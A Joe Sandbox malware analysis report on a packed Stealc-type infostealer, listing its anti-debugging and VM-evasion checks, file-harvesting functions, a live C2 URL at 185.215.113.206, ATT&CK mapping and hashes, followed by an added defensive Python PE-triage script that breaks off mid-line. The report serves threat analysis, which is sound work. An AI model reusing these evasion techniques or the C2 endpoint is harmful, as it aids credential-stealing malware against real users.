                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CFEE32 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-39046
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_007F40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_007EE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007E1710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_007F47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007EF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007F4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_007F3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_007EDB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_007EBE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_007EEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007EDF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E1160 GetSystemInfo,ExitProcess,0_2_007E1160
                Source: file.exe, file.exe, 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2107101816.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2107101816.0000000001483000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2107101816.000000000143E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2107101816.00000000014A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW*
                Source: file.exe, 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37861
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37858
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37878
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37873
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37913
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37747
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E4610 VirtualProtect ?,00000004,00000100,000000000_2_007E4610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007F9BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F9AA0 mov eax, dword ptr fs:[00000030h]0_2_007F9AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F7690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_007F7690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6528, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_007F9790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F98E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_007F98E0
                Source: file.exe, file.exe, 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: C1Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00827588 cpuid 0_2_00827588
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_007F7D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F7B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_007F7B10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F79E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_007F79E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F7BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_007F7BC0

                Stealing of Sensitive Information

                Source: Yara matchFile source: 0.2.file.exe.7e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2065563617.0000000005130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2107101816.000000000143E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6528, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara matchFile source: 0.2.file.exe.7e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2065563617.0000000005130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2107101816.000000000143E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6528, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                11
                Process Injection
                1
                Masquerading
                OS Credential Dumping2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                2
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                33
                Virtualization/Sandbox Evasion
                LSASS Memory641
                Security Software Discovery
                Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools
                Security Account Manager33
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection
                NTDS13
                Process Discovery
                Distributed Component Object ModelInput Capture12
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                Account Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information
                Cached Domain Credentials1
                System Owner/User Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing
                DCSync1
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc Filesystem334
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe
                No contacted domains info
                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrue
                  unknown
                  http://185.215.113.206/true
                    unknown
URLs from memory and binary strings
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206xj:o | file.exe, 00000000.00000002.2107101816.000000000143E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.php/ | file.exe, 00000000.00000002.2107101816.0000000001499000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.2107101816.0000000001499000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2107101816.000000000143E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.206/6c4adf523b719729.php/m | file.exe, 00000000.00000002.2107101816.0000000001499000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.phpl | file.exe, 00000000.00000002.2107101816.0000000001499000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.phpH | file.exe, 00000000.00000002.2107101816.0000000001499000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2065563617.000000000515B000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
Note: the characters after the C2 strings (xj:o, /m, l, H) are bytes adjacent to the string in the dumped heap, not distinct paths; the only URLs the sample actually requested are the two in the contacted-URL table above. The docs.rs/getrandom URL is a compile-time string of the Rust getrandom crate and is not a network indicator.
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1543747
                                Start date and time:2024-10-28 11:21:09 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 3m 19s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:2
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 19
                                • Number of non-executed functions: 134
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated
                                • Exclude process from analysis (whitelisted): dllhost.exe
                                • VT rate limit hit for: file.exe
                                No simulations
IP context: 185.215.113.206 in earlier analyses
Associated sample | Detection | Threat name | Context
file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.206/6c4adf523b719729.php
file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
                                No context
ASN context: WHOLESALECONNECTIONSNL in earlier analyses
Associated sample | Detection | Threat name | IP
Bjl3geiFEK.exe | malicious | Phorpiex | 185.215.113.66
file.exe | malicious | Stealc, Vidar | 185.215.113.206
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | Stealc, Vidar | 185.215.113.206
file.exe | malicious | LummaC | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | LummaC | 185.215.113.16
file.exe | malicious | Stealc, Vidar | 185.215.113.206
file.exe | malicious | LummaC | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.206
                                No context
                                No context
                                No created / dropped files found
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.9593043035745525
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:2'108'416 bytes
                                MD5:fae77ee19103237b52405630de9aa6a7
                                SHA1:5fa3fae94c12a0fc0fa6de9d9dfb72aa0ee0749b
                                SHA256:09a622aeeec375f783c6a88a7f9bb6f9a1cf90af6dcf2d57f18eda2ca5a88cca
                                SHA512:6e9658bd66aa5a19b3df0b06268ea4d97e9459b42d9a1ca769cc4adab388ca0d892eae66a1dbcd75c1b8111a476952437d1958bced158a4ea53dec7ae60fcbac
                                SSDEEP:49152:HZftVYV5oaLjvX4/dQ+J4dgRlP1pZSGCSRy7W:HZftVm7KQ++dgRlP18SRy7W
                                TLSH:F4A5334EC693DC2BECF58737E8CDA563D1666B2E5C2ECB2145B499335AEB30C64C4052
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
                                Icon Hash:00928e8e8686b000
                                Entrypoint:0xb1f000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b
Entrypoint instruction:jmp 00007FBA69086E5Ah
                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319
Data directories
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e9050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e91f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(no name) | 0x1000 | 0x2e7000 | 0x67600 | 292b81d7c7cb4b0c6c60f8171c0877ec | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2e8000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x2e9000 | 0x1000 | 0x200 | 049071433b9f7c843453337b0fd53002 | False | 0.1328125 | data | 0.8946074494647072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(no name) | 0x2ea000 | 0x29c000 | 0x200 | ed7493e2cf12fbc2466c69275aa71423 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gauffcuy | 0x586000 | 0x198000 | 0x197c00 | a203a3a69c957ff2d0ee5aaa95d2b4d4 | False | 0.9951195825030656 | data | 7.95487743480404 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
psmvcilc | 0x71e000 | 0x1000 | 0x400 | df982fdf59cb03ccb4a4cdc2a8bee0b7 | False | 0.783203125 | data | 6.083863705894662 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x71f000 | 0x3000 | 0x2200 | bcf7d7b14e9b7766723fc6eb52fad597 | False | 0.0661764705882353 | DOS executable (COM) | 0.8160131490665861 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Imports
DLL | Import
kernel32.dll | lstrcpy
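The section table, entry point and import list above are what a triage analyst reads first: the entry point (RVA 0x71f000) sits in .taggant rather than in a code section, two sections carry no name and two carry random eight-letter names, gauffcuy holds nearly the whole file at entropy 7.95, every section except .rsrc and .idata is readable, writable and executable at once, and the import table holds a single function (kernel32!lstrcpy) while the execution graph further down shows LoadLibraryA and GetProcAddress resolving the rest at run time. The three Yara hits at 0x7E1000 with page protection 0x40 (PAGE_EXECUTE_READWRITE) fall in the nameless first section (runtime image base 0x7e0000 plus RVA 0x1000), which is where the stub unpacks Stealc. The following is an added example, not code from Joe Sandbox or from the sample: a standard-library Python PE32 section-table parser with exactly those checks. build_sample_pe() constructs a tiny synthetic PE laid out like this one (nameless RWX first section filled with random bytes, .idata, entry point inside .taggant) so that the code runs offline; that synthetic file is constructed data, not the analysed binary, and the thresholds in triage() are this example's own.

```python
"""Static triage of a PE32 section table like the one in this report.
Added example (not code from Joe Sandbox or the sample), standard library only.
build_sample_pe() constructs a small synthetic PE laid out like this sample
(nameless RWX section of random bytes, .idata, entry point in .taggant);
it is constructed data, not the analysed file."""
import math
import random
import struct
from collections import Counter, namedtuple

IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA = 0x20, 0x40
IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x40000000, 0x80000000
USUAL_CODE_SECTIONS = {".text", "CODE", ".code"}

Section = namedtuple("Section", "name virtual_address virtual_size raw_size characteristics entropy")
PEInfo = namedtuple("PEInfo", "entry_point_rva image_base sections")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 is incompressible (encrypted/compressed), plain x86 code sits around 5-6.5."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def parse_pe(data: bytes) -> PEInfo:
    """Minimal header walk: DOS header -> PE signature -> COFF -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24                      # optional header follows the 20-byte COFF header
    magic, entry = struct.unpack_from("<H", data, opt)[0], struct.unpack_from("<I", data, opt + 16)[0]
    if magic == 0x10B:                       # PE32: ImageBase is a DWORD at +28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:                     # PE32+: ImageBase is a QWORD at +24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    sections = []
    for i in range(nsections):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        raw = data[raw_ptr:raw_ptr + raw_size]
        sections.append(Section(name.rstrip(b"\0").decode("latin-1"), va, vsize, raw_size, chars,
                                shannon_entropy(raw)))
    return PEInfo(entry, image_base, sections)


def entry_section(pe: PEInfo):
    """Section whose virtual range holds AddressOfEntryPoint, or None."""
    for s in pe.sections:
        if s.virtual_address <= pe.entry_point_rva < s.virtual_address + max(s.virtual_size, s.raw_size):
            return s
    return None


def is_rwx(s: Section) -> bool:
    rwx = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
    return s.characteristics & rwx == rwx


def triage(pe: PEInfo) -> list:
    """Findings a packed binary typically produces; the thresholds are this example's own."""
    findings, ep = [], entry_section(pe)
    if ep is None:
        findings.append("entry point 0x%x lies in no section" % pe.entry_point_rva)
    elif ep.name not in USUAL_CODE_SECTIONS or not ep.characteristics & IMAGE_SCN_CNT_CODE:
        findings.append("entry point in non-standard section %r" % ep.name)
    for s in pe.sections:
        if is_rwx(s):
            findings.append("RWX section %r" % s.name)
        if not s.name:                       # random names such as 'gauffcuy' need a separate check
            findings.append("nameless section at RVA 0x%x" % s.virtual_address)
        if s.raw_size >= 0x200 and s.entropy > 7.0:
            findings.append("high-entropy section %r (%.2f bits/byte)" % (s.name, s.entropy))
    return findings


def build_sample_pe(seed: int = 7) -> bytes:
    """Synthetic PE32 with the report's layout (constructed data; sizes are tiny)."""
    rnd = random.Random(seed)
    rwx = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    rw = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    layout = [  # (name, virtual size, raw bytes, characteristics)
        (b"", 0x10000, bytes(rnd.getrandbits(8) for _ in range(0x1000)), rwx),   # "packed" payload
        (b".idata", 0x1000, b"KERNEL32.dll\0lstrcpy\0".ljust(0x200, b"\0"), rw),
        (b".taggant", 0x1000, b"\xe9\0\0\0\0".ljust(0x200, b"\0"), rwx),          # stub: one jmp
    ]
    sect_align, headers_size = 0x1000, 0x400
    sect_hdrs, body, va, raw_ptr, entry_rva = b"", b"", sect_align, headers_size, 0
    for name, vsize, raw, chars in layout:
        entry_rva = va if name == b".taggant" else entry_rva
        sect_hdrs += struct.pack("<8sIIIIIIHHI", name, vsize, va, len(raw), raw_ptr, 0, 0, 0, 0, chars)
        body, va, raw_ptr = body + raw, va + -(-vsize // sect_align) * sect_align, raw_ptr + len(raw)
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, 224, 0x0102)   # i386, EXECUTABLE|32BIT
    optional = struct.pack("<HBBIIIIIIIII", 0x10B, 14, 0, 0, 0, 0, entry_rva, 0, 0,
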